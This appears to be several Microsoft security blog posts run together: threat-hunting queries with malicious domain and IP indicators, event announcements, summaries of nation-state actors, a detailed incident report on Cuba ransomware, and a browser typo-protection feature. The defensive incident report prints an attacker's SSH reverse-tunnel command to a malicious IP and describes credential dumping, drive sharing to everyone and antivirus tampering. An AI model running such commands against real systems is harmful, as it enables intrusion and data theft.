Query that searches for files downloaded from malicious domains and IP addresses.
DeviceFileEvents
| where (FileOriginUrl has_any ("strainservice.com")) or (FileOriginIP has_any ("198.54.115.248"))
Query that searchers for Office apps downloading files from uncommon domains, groups users, filenames, and devices together:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName), FileList=make_set(FileName) by FileOriginUrl, FileOriginIP, InitiatingProcessFileName
Looks for downloaded files with uncommon file extensions, groups remote IPs, URLs, filenames, users, and devices:
DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
| extend Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP), UrlList=make_set(FileOriginUrl), FileList=make_set(FileName), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName
Looks for Office apps that have child processes that match the GUID command line, with a check for Microsoft binaries to reduce the results before the regex:
DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
| where ProcessCommandLine matches regex @"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]$"
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy
To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:
Notebooks are gaining popularity in InfoSec. Used interactively for investigations and hunting or as scheduled processing jobs, notebooks offer plenty of advantages over traditional security operations center (SOC) tools. Sitting somewhere between scripting/macros and a full-blown development environment, they offer easy entry to data analyses and visualizations that are key to modern SOC engagements.
Join our community of analysts and engineers at the third annual InfoSec Jupyterthon 2022, where you’ll meet and engage with security practitioners using notebooks in their daily work. This is an online event taking place on December 2 and 3, 2022. It is organized by our friends at Open Threat Research, together with folks from Microsoft Security research teams and the Microsoft Threat Intelligence Center (MSTIC).
Although this is not a Microsoft event, our Microsoft Security teams are delighted to be involved in helping organize it and deliver talks. Registration is free and it will be streamed on YouTube Live both days from 10:30 AM to 5:00 PM Eastern Time. We’ll also have a dedicated Discord channel for discussions and session Q&A.
Do you have a cool notebook or some interesting techniques or technology to talk about? There are still openings for talks and mini talks (30-minute, 15-minute, and 5-minute sessions). Submit your proposal here.
At CyberWarCon 2022, Microsoft and LinkedIn analysts presented several sessions detailing analysis across multiple sets of actors and related activity. This blog is intended to summarize the content of the research covered in these presentations and demonstrates Microsoft Threat Intelligence Center’s (MSTIC) ongoing efforts to track threat actors, protect customers from the associated threats, and share intelligence with the security community.
The CyberWarCon sessions summarized below include:
“They are still berserk: Recent activities of BROMINE” – a lightning talk covering MSTIC’s analysis of BROMINE (aka Berserk Bear), recent observed activities, and potential changes in targeting and tactics.
“The phantom menace: A tale of Chinese nation-state hackers” – a deep dive into several of the Chinese nation-state actor sets, their operational security patterns, and case studies on related tactics, techniques, and procedures (TTPs).
“ZINC weaponizing open-source software” – a lighting talk on MSTIC and LinkedIn’s analysis of ZINC, a North Korea-based actor. This will be their first public joint presentation, demonstrating collaboration between MSTIC and LinkedIn’s threat intelligence teams.
MSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections and improve customer protections. As with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.
They are still berserk: Recent activities of BROMINE
BROMINE overlaps with the threat group publicly tracked as Berserk Bear. In our talk, MSTIC provided insights into the actor’s recent activities observed by Microsoft. Some of the recent activities presented include:
Targeting and compromise of dissidents, political opponents, Russian citizens, and foreign diplomats. These activities have spanned multiple methods and techniques, ranging from the use of a custom malicious capability to credential phishing leveraging consumer mail platforms. In some cases, MSTIC has identified the abuse of Azure free trial subscriptions and worked with the Azure team to quickly take action against the abuse.
Continued targeting of organizations in the manufacturing and industrial technology space. These sectors have been continuous targets of the group for years and represent one of the most durable interests.
An opportunistic campaign focused on exploiting datacenter infrastructure management interfaces, likely for the purpose of access to technical information of value.
Targeting and compromise of diplomatic sector organizations focused on personnel assigned to Eastern Europe.
Compromise of a Ukrainian nuclear safety organization previously referenced in our June 2022 Special Report on Defending Ukraine (https://aka.ms/ukrainespecialreport).
Overall, our findings continue to demonstrate that BROMINE is an elusive threat actor with a variety of potential objectives, yet sporadic insights from various organizations, including Microsoft, demonstrate there is almost certainly more to find. Additionally, our observations show that as a technology platform provider, threat intelligence enables Microsoft’s ability to protect both enterprises and consumers and disrupt threat activity affecting our customers.
The phantom menace: A tale of China-based nation state hackers
Over the past few years, MSTIC has observed a gradual evolution of the TTPs employed by China-based threat actors. At CyberWarCon 2022, Microsoft analysts presented their analysis of these trends in Chinese nation-state actor activity, covering:
Information about new tactics that these threat actors have adopted to improve their operational security, as well as a deeper look into their techniques, such as leveraging vulnerable SOHO devices for obfuscating their operations.
Three different case studies, including China-based DEV-0401 and nation-state threat actors GALLIUM and DEV-0062, walking through (a) the initial vector (compromise of public-facing application servers, with the actors showing rapid adoption of proofs of concept for vulnerabilities in an array of products), (b) how these threat actors maintained persistence on the victims (some groups dropping web shells, backdoors, or custom malware), and (c) the objectives of their operations: intelligence collection for espionage.
A threat landscape overview of the top five industries that these actors have targeted—governments worldwide, non-government organizations (NGO)s and think tanks, communication infrastructure, information technology (IT), and financial services – displaying the global nature of China’s cyber operations in the span of one year.
As demonstrated in the presentation, China-based threat actors have targeted entities nearly globally, employing techniques and using different methodologies to make attribution increasingly harder. Microsoft analysts assess that China’s cyber operations will continue to move along their geopolitical agenda, likely continuing to use some of the techniques mentioned in the presentation to conduct their intelligence collection. The graphic below illustrates how quickly we observe China-based threat actors and others exploiting zero-day vulnerabilities and then those exploits becoming broadly available in the wild.
In this talk, Microsoft and LinkedIn analysts detail recent activity of a North-Korea based nation-state threat actor we track as ZINC. Analysts detailed the findings of their investigation (previously covered in this blog) and walked through the series of observed ZINC attacks that targeted 125 different victims spanning 34 countries, noting the attacks appear to be motivated by traditional cyber-espionage and theft of personal and corporate data. A few highlights include:
In September 2022, Microsoft disclosed detection of a wide range of social engineering campaigns using weaponized legitimate open-source software. MSTIC observed activity targeting employees in organizations across multiple industries including media, defense and aerospace, and IT services in the US, UK, India, and Russia.
Based on the observed tradecraft, infrastructure, tooling, and account affiliations, MSTIC attributes this campaign with high confidence to ZINC, a state-sponsored group based out of North Korea with objectives focused on espionage, data theft, financial gain, and network destruction.
When analyzing the data from an industry sector perspective, we observed that ZINC chose to deliver malware most likely to succeed in a specific environment, for example, targeting IT service providers with terminal tools and targeting media and defense companies with fake job offers to be loaded into weaponized PDF readers.
ZINC has successfully compromised numerous organizations since June 2022, when the actor began employing traditional social engineering tactics by initially connecting with individuals on LinkedIn to establish a level of trust with their targets.
Upon successful connection, ZINC encouraged continued communication over WhatsApp, which acted as the means of delivery for their malicious payloads. MSTIC observed ZINC weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks. ZINC was observed attempting to move laterally across victim networks and exfiltrate collected information from.
As the threat landscape continues to evolve, Microsoft strives to continuously improve security for all, through collaboration with customers and partners and by sharing our research with the larger security community. We would like to extend our thanks to CyberWarCon and LinkedIn for their community partnership.
Ransomware is one of the most pervasive threats that Microsoft Detection and Response Team (DART) responds to today. The groups behind these attacks continue to add sophistication to their tactics, techniques, and procedures (TTPs) as most network security postures increase.
In this blog, we detail a recent ransomware incident in which the attacker used a collection of commodity tools and techniques, such as using living-off-the-land binaries, to launch their malicious code. Cobalt Strike was used for persistence on the network with NT AUTHORITY/SYSTEM (local SYSTEM) privileges to maintain access to the network after password resets of compromised accounts.
This incident highlights an attacker’s ability to have a longstanding dwell time on a network before deploying ransomware. We will also discuss the various techniques used as well as the recommended detections and defense techniques that customers can use to increase protection against these types of attacks.
Microsoft recommends hunting proactively for pre-ransomware behaviors and hardening your network to prevent impact. Refer to https://aka.ms/ransomware-as-a-service for more information about defending against ransomware-related incidents.
What we found
Figure 1. Overall timeline of activities of the ransomware incident
Initial access
DART was unable to determine the initial entry vector of this attack due to the age of this compromise and limited retention of security solutions, along with encrypted devices being reimaged before analysis. The earliest observed activity showed the actor with domain administrator credentials.
Persistence
In DART’s post ransomware investigation of this engagement, the team found multiple instances of scheduled tasks and services being created by the attack for persistence after they had gained access to highly privileged credentials. Services and Scheduled Tasks have the option to run as NT AUTHORITY\System, allowing their malicious code to run with highly privileged access. Because the actor created those tasks and services on a domain controller, the Local SYSTEM access allowed them to easily access domain administrator accounts. The deployment of a backdoor to a domain controller can help an actor bypass common incident response recovery activity, such as resetting compromised accounts, in the hope of staying resident on the network.
Service: Cobalt Strike
Cobalt Strike was seen on a large scale across the network, on domain controllers, servers, and administrator workstations. The actor created Windows services to persist their payload executing rundll32 to load the Cobalt Strike DLL through invoking the “AllocConsole” exported function of a variation of the Termite family of malware. These services were observed to execute with a combination of SYSTEM and domain administrator credentials. Termite malware is often used by crimeware groups to load Cobalt Strike while bypassing antivirus detections. Further information on the Termite malware family can be found in this blog: (Ex)Change of Pace: UNC2596 Observed Leveraging Vulnerabilities to Deploy Cuba Ransomware.
Figure 2. Example of the actor executing Cobalt Strike through rundll32.exe with system integrity
The Cobalt Strike DLLs were in C:\Windows\Temp and used a naming scheme based on the first and local octet of the command and control (C2). Once the actor installed Cobalt Strike on a domain controller, the malware was spread using a PowerShell script, which copied the DLL to C:\Windows\Temp via SMB, and then executed it through remote service creation.
Figure 3. Example of the threat actor copying Cobalt Strike through SMB
The actor elevated their permissions to “NT AUTHORITY\System” through service creation. This service creation was likely done through Cobalt Strike, using a pseudorandom service name, such as “4aedb00”.
Scheduled task: OpenSSH
The actor installed OpenSSH on the client’s network to maintain persistence on critical servers, including domain controllers and domain administrator workstations. The actor installed OpenSSH within C:\Windows\OpenSSH, rather than the standard OpenSSH path in System32.
The actor created a scheduled task for a persistent SSH connection to their C2 as “NT AUTHORITY\System”. The actor used TCP 443 for their SSH traffic rather than the standard TCP 22. In many organizations, TCP 22 outbound may be blocked, but as TCP 443 is needed for web traffic the port is often open. The actor also enabled port forwarding on TCP 7878 to allow the tunneling of malicious tools through the SSH connection.
The actor was also observed renaming ssh.exe to “C:\Windows\OpenSSH\svchost.exe” in a likely attempt to evade detection.
Figure 4. Example of the process masquerading to hide SSH usage
Four days after the actor deployed the ransomware, the actor returned to the compromised network through their existing OpenSSH persistence to install further persistence SSH services on additional domain controllers and domain administrator workstations.
The actor used OpenSSH’s sftp-server to transfer files between their C2 and the compromised host. The actor generated SSH keys on compromised hosts using ssh-keygen.exe, a tool apart of the OpenSSH tool suite. This allowed the actor to SSH using the keys rather than credentials, after credentials had been reset.
Lateral movement
Impacket (WMI)
Impacket’s WMI modules were used throughout the early stages of the compromise for remote execution and discovery. Impacket is an open-source collection of scripts for working with network protocols. This toolkit has recently been used by a large variety of crimeware groups for lateral movement and network discovery.
The actor used Impacket to execute PowerShell scripts out of “C:\Perflogs\”, which created .txt files within the same directory. All commands executed through Impacket output the results of the command to “\\127.0.0.1\ADMIN$\__1648051380.61”. The actor then deleted the PowerShell scripts and text files after execution.
Figure 5. Sample Impacket query with results being output into a file within the ADMIN$ directory
The actor also used Impacket to test if the destination server was able to ping the actor’s C2 before deploying Cobalt Strike to the device.
Figure 6. Actor testing the connectivity to their C2 through Impacket
PsExec
The actor used PsExec.exe to spread the ransomware on the victims’ network. The actor first executed “open.bat”, which executed “net share [C-Z]=[C-Z]:\ /grant:everyone,FULL”. This shared every drive on the host, granting access to everyone. “A.exe”, “Anet.exe”, and “Aus.exe” are all variants of the Cuba ransomware.
Figure 7. Command lines the actor executed through PsExec
Remote desktop protocol
While the attacker had access to lateral movement and remote code execution via Impacket and PsExec, the main method they used for lateral movement in this incident was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The actor used domain administrator accounts to RDP between devices.
Credential access
WDigest
The actor abused WDigest to cache credentials early in the compromise. This enabled the actor to gain access to domain administrator credentials.
WDigest is a Windows feature that when enabled, caches credentials in clear text. This is often abused by credential access tools, such as Mimikatz. To detect if WDigest has been enabled within your network, the registry key HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential will be set to 1. This can be disabled by setting the value to 0.
Figure 8. Example of the actor enabling WDigest
NTDSUtil Dumping
The actor obtained the Active Directory database (NTDS.dit) twice. On the first instance, the actor obtained the NTDS.dit five months into the compromise. Four days after the deployment of ransomware, the actor obtained the NTDS.dit a second time. The actor was able to create a copy of the NTDS.dit through the usage of the native tool ntdsutil.exe, copying the .dit to “C:\Windows\Temp\data\audit\Active Directory\ntds.dit”.
Figure 9. Actor command to obtain ntds.dit
Volume shadow copy access
The actor used a second method to obtain the Active Directory database, they used “vssadmin” to create a volume shadow copy of a domain controller. This technique creates a static copy of system files that a user would not typically be able to access. Once the volume shadow copy was created, the actor copied the NTDS.dit, SYSTEM hive and SECURITY hive to C:\Windows\, where they could then remotely copy through the ADMIN$ share.
Figure 10. Actor commands to create Volume Shadow Copy and copy the ntds.dit
Exfiltration
Compression
The actor was observed using 7-Zip to compress files before exfiltration. 7z.exe was executed out of C:\Windows\Temp. The actor did not include a password for the archive and used the device hostname as the name of the archive (for example: DC01.7z).
PSCP
The actor used PuTTY Secure Copy (PSCP) to remotely exfiltrate network shares to an actor controlled C2. This version of PSCP had been renamed to “lsas.exe” in an attempt to masquerade itself as the legitimate “lsass.exe” service. PSCP was executed out of C:\Windows\Temp. The actor targeted Staff and Financial related resources.
Figure 11. Masqueraded PSCP to exfiltrate files
Defense evasion
Disabling antivirus
The actor disabled Microsoft Defender Antivirus on multiple devices after files had been quarantined by the antivirus. The actor turned off Microsoft Defender Antivirus through the Windows Security GUI application while connected via RDP to the device.
Figure 12. Microsoft Defender for Endpoint alert from the actor disabling real-time monitoring
Kernel driver
The actor used an Avast anti-rootkit driver. Unit 42 recently released a blog on how Cuba ransomware groups have used this driver to disable antivirus software before deploying the Cuba ransomware.
The actor installed the driver using the “sc” command, enabling kernel-level permissions. The actor then started the service with “sc start aswSP-ArPot2”. This service was used by the actor to disable the victims’ antivirus products through Kernel privileges. Antivirus products being disabled within the victim network ensured that their ransomware would spread without the malware being quarantined or prevented.
Figure 13. Vulnerable driver being installed
The actor also created benign binaries to trigger the driver vulnerability. These binaries would iterate through a list of common antivirus executable names, providing each one to the control code 0x9988C094 and subsequently tasking the driver to kill those processes.
Discovery
The actor was observed executing generic system enumeration commands. While these commands are not malicious, when seen together, it can often indicate an unauthorized user is enumerating the system.
The actor was seen executing the following commands:
As we observe more attacks using similar methods as described in this blog, organizations must ensure they follow security practices to defend their servers. The following is a list of recommendations for monitoring that organizations should implement as part of their detection strategy.
Service creation
Service creation events should be monitored for anomalous events. A high priority alert should be placed on administrator accounts creating services that execute as System. This is a common privilege escalation technique that can be utilized in a variety of methods, including having the service.
Execute a malicious binary directly,
Write to an actor controlled Named Pipe, allowing the actor to steal an impersonation token,
Executing a DLL through rundll32.exe
Figure 14. Instance of rundll32.exe execute Cobalt Strike with System integrity level
New service creations should be monitored for anomalous paths or executables. High priority alerts should be made for drivers located within those anomalous paths. While the driver was legitimately signed, the location can be a sign of malicious use. Examples of anomalous paths include but are not limited to:
C:\Temp\
C:\ProgramData\
C:\Windows\
C:\Windows\Temp\
Use of SSH
Microsoft recommends monitoring for unauthorized installations and usage of SSH in your network. SSH should not run as “NT AUTHORITY\System”.
In this incident, the actor used the following SSH command lines. Similar activity should be monitored within your environment:
ssh <organization>@<malicious IP address> -p 443 -i C:\ProgramData\ssh\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no
The actor attempted to masquerade the SSH process as “svchost.exe”, so monitoring for the command on other process names may indicate process masquerading.
Copying to remote share
Microsoft recommends monitoring for the command prompt accessing remote shares. This was a common technique used by the actor for transferring files throughout the network.
Figure 15. The actor copying Cobalt Strike via SMB
Microsoft Defender for Endpoint will create an alert when the command prompt accesses remote shares. This includes the Impacket usage where the command targets the localhost ADMIN$ share. Monitoring these alerts within your network can help detect unauthorized access.
Figure 16. Sample alert in Defender for Endpoint when a command prompt accesses a remote share
PsExec
Networks should monitor for unauthorized usage of PsExec. Suggested detection techniques include:
Existence or execution of the binary: PsExec.exe
Existence or execution of the service binary: PsExeSvc.exe
Service creation named PsExeSvc
Named Pipes created with the name PsExeSvc
The techniques that PsExec uses can easily be replicated, either through living-off-the-land tools or through a custom toolset using the Windows API. Monitoring for each stage of PsExec can help detect unauthorized variants within your network. PsExec works in three stages:
SMB connection to ADMIN$ on the destination device, copying the binary “PSEXESVC” to the Windows directory.
Remote connection to RPC (port 135) on the destination device, creating a service to execute the binary.
Create the named pipe \\.\pipe\PSEXESVC to remotely communicate between host and destination.
Figure 17. Diagram describing how PsExec works
Monitoring executable files being written to administrative shares may help detect attempts of lateral movement. This can include monitoring for native command lines, such as copy, targeting remote shares like what we mentioned above. Defender for Endpoint can be used to monitor file creation events via Server Message Block (SMB) through DeviceFileEvents. The executable file will be created by the ntoskrnl.exe process, which is the kernel process that manages SMB, and the ShareName column will be ADMIN$.
Figure 18. Example of PsExeSvc.exe being created via Server Message Block (SMB) in Defender for Endpoint
Anomalous remote connections to RPC (Port 135) should be monitored within the network, as this can be used by a process to remotely create and start a service. The summarize and sort operators within Defender for Endpoint’s Advanced Hunting can help detect uncommon connections on Port 135. The following KQL can help build a basis for identifying anomalous connections:
DeviceNetworkEvents
| where RemotePort == 135
| summarize count() by InitiatingProcessFileName
| sort by count_ asc
Figure 19. Image showing PsExec.exe connecting to a remote host on port 135
This technique can also be replicated through remote service creation using named pipes. An actor can remotely connect to the IPC$ share and open the named pipe svcctl to remotely create a service. This would contain similar detections, except the traffic will be over port 445 to the IPC$ share.
On the destination end, the RPC connection will result in the creation of a service. Monitoring for unauthorized service creation can be done through capturing the 4679 event in the System event log.
Figure 20. Service creation event in Defender for Endpoint
Remote named pipe communication can be monitored through the creation of the named pipe on the destination server. PsExeSvc.exe will create a named pipe called PSEXESVC, which the host device can connect to through the IPC$ share. As the host device connection is through SMB, the ntoskrnl.exe process will connect to the named pipe as a client.
Figure 21. Remote SMB named pipe communications for PsExec
NTDS.dit dumping
Monitor the usage of ntdsutil for malicious instances, where actors may attempt to obtain the NTDS.dit. The command in the NTDS.dit dumping section shows how the actor used this tool to create a copy of the NTDS.dit. This command can be monitored, with the path being the only variable that will change. There are limited legitimate reasons to create a full NTDS.dit copy.
Figure 22. Defender for Endpoint alert from ntds.dit dump
Defender for Endpoint alerts on the dumping of the NTDS.dit, and these alerts should be responded to with high priority. Monitoring for the unauthorized usage of the “ntdsutil” tool is strongly encouraged as well.
If your network has file monitoring enabled, alerting on the creation of new .dit files can also help detect potential NTDS.dit dumping. The actor was observed copying the NTDS.dit out of a volume shadow copy.
Figure 23. Example command copying NTDS.dit from a volume shadow copy
Antivirus tampering
Organizations should monitor and respond to antivirus and endpoint detection and response (EDR) alerts where antivirus has been disabled or tampered with. Wherever possible, anti-tampering settings should be enabled to prevent actors from being able to interact with and disable antivirus software. For more information about Defender for Endpoint tamper protection, visit our docs page: Protect security settings with tamper protection.
Microsoft Defender Antivirus provides event logging on attempted tampering of the product. This can include the disabling of services, such as Real Time Protection (Event ID: 5001). An alert will also be created within the Defender for Endpoint portal where customers have the ability to further triage the alert through the advanced hunting interface. Monitoring for the usage of the Windows PowerShell cmdlet can also help discover instances of anti-virus tampering.
Figure 24. Sample command to look for antivirus tampering
Remote desktop protocol
DART was able to detect actor RDP connections through anomalous connections. These anomalous connections include:
Domain administrators logging into multiple servers for the first time, and
Domain administrators initiating RDP connections from abnormal locations.
Domain and enterprise administrator logons should be audited for anomalous connections, including connections originating from edge servers or onto servers that they do not usually administrate. Multifactor authentication (MFA) should be enforced for administrator accounts.
Conclusion
Ransomware groups continue to grow in sophistication through the increasing hibernation times before encryption, large varieties of persistent access and the use of legitimate signed binaries. These groups continue to target sensitive data for exfiltration, with some groups returning to the network post-encryption to ensure they maintain a foothold on the network.
Networks must remain vigilant hunting for these TTPs and anomalous behaviors. The Cuba ransomware group used a large variety of living of the land techniques to help evade detection by antivirus products. This requires a stronger focus on anomaly and behavioral detections for hunting on a network, rather than standard malicious file detection. Software auditing of remote access tools and remote execution tools, such as PsExec and SSH, should be regularly evaluated.
Microsoft strongly recommends focusing on the following actions to help improve your network’s security posture:
Enabling tamper protection on antivirus products.
Triage high severity antivirus and EDR alerts within a timely manner, including tampering alerts.
Enable MFA and monitoring for administration accounts.
Monitoring anomalies in service and scheduled task creation.
To understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/DART.
It’s easy to make typos when writing out a website name (URL), but these simple mistakes can lead you to potentially fraudulent websites planted by malicious actors. Website typo protection helps protect you when you accidentally navigate to a fraudulent site after misspelling a well-known site’s URL by guiding you to land on the legitimate site instead.
This year, we increased our phishing and fraud protections by partnering with the Microsoft Bing Indexing team on website typo protection. This partnership enables us to constantly scour the web for new “typosquatters” (the bad actors who target these small errors) and dynamically update Microsoft Edge, thus protecting you against newly identified “typosquatting” sites as soon as they are discovered.
Website typo protection complements the Microsoft Defender SmartScreen service to defend against web threats. Microsoft Defender SmartScreen helps protect users against websites that engage in phishing and malware campaigns. Typosquatters engage in phishing activities too, but there are only so many ways in which one can mistype a brand. Malicious actors know this and choose to host less aggravating content on “typosquat” URLs to avoid detection. Typosquatting site owners profit on users’ mistakes by taking them to advertising sites, affiliate links, false products, fake search engine results, or in some cases by redirecting users into parked domains reserved for very short-lived phishing campaigns.
Website typo protection warns users about popular misspellings that could result in loss of personal and financial information.
When encountering a typosquatting site that we have identified, you’ll be greeted with an interstitial warning page suggesting you might have misspelled the site you’re navigating to and asking you to verify the site address before proceeding. Enterprise customers can configure website typo protection through the TyposquattingCheckerEnabled policy.
We would love to hear more about your experience with Microsoft Edge. Please continue to join us on the Microsoft Edge Insider forums or Twitter to discuss your experience and let us know what you think! We hope you enjoy the changes and look forward to your feedback.
